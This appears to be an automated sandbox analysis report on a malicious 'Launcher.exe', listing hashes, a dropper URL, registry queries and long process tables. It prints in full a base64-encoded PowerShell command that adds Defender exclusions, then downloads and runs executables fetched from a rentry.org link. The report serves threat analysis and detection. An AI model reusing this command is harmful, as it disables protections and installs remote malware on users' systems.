7234b080bdcea32573730ff1a6f7e17985ccd2d2743b3b9a4da5d30c0cfda846

Analysis

max time kernel
1799s
max time network
1801s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
15-06-2024 18:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Launcher.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Launcher.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

216 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Launcher.exe

pid	process
216	powershell.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629523837460155"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exechrome.exechrome.exechrome.exe

pid process

216 powershell.exe
216 powershell.exe
3280 chrome.exe
3280 chrome.exe
3884 chrome.exe
3884 chrome.exe
548 chrome.exe
548 chrome.exe

pid	process
216	powershell.exe
216	powershell.exe
3280	chrome.exe
3280	chrome.exe
3884	chrome.exe
3884	chrome.exe
548	chrome.exe
548	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

Processes:

chrome.exechrome.exe

pid	process
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exechrome.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	216	powershell.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3884	chrome.exe
Token: SeCreatePagefilePrivilege	3884	chrome.exe
Token: SeShutdownPrivilege	3884	chrome.exe
Token: SeCreatePagefilePrivilege	3884	chrome.exe
Token: SeShutdownPrivilege	3884	chrome.exe
Token: SeCreatePagefilePrivilege	3884	chrome.exe
Token: SeShutdownPrivilege	3884	chrome.exe
Token: SeCreatePagefilePrivilege	3884	chrome.exe
Token: SeShutdownPrivilege	3884	chrome.exe

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

chrome.exechrome.exe

pid	process
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

chrome.exechrome.exe

pid	process
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe
3884	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exechrome.exe

description	pid	process	target process
PID 2356 wrote to memory of 216	2356	Launcher.exe	powershell.exe
PID 2356 wrote to memory of 216	2356	Launcher.exe	powershell.exe
PID 3280 wrote to memory of 4064	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 4064	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2580	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 4380	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 4380	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe
PID 3280 wrote to memory of 2220	3280	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:8
1⤵
PID:4560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:8
1⤵
PID:3816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffefa6ab58,0x7fffefa6ab68,0x7fffefa6ab78
2⤵
PID:4064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:2
2⤵
PID:2580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:8
2⤵
PID:4380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2276 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:8
2⤵
PID:2220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:1820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:4240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4436 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:4624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:8
2⤵
PID:4604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:8
2⤵
PID:588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4604 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:1396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5104 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:1672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3296 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:3400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3416 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4516 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4144 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:2596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4800 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:3160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3400 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:3708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4252 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:1068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4676 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:1448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3944 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4556 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:1
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffefa6ab58,0x7fffefa6ab68,0x7fffefa6ab78
2⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=556 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:2
2⤵
PID:2780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:8
2⤵
PID:2376

C:\Program Files\Google\Chrome\Application\chrome.exe
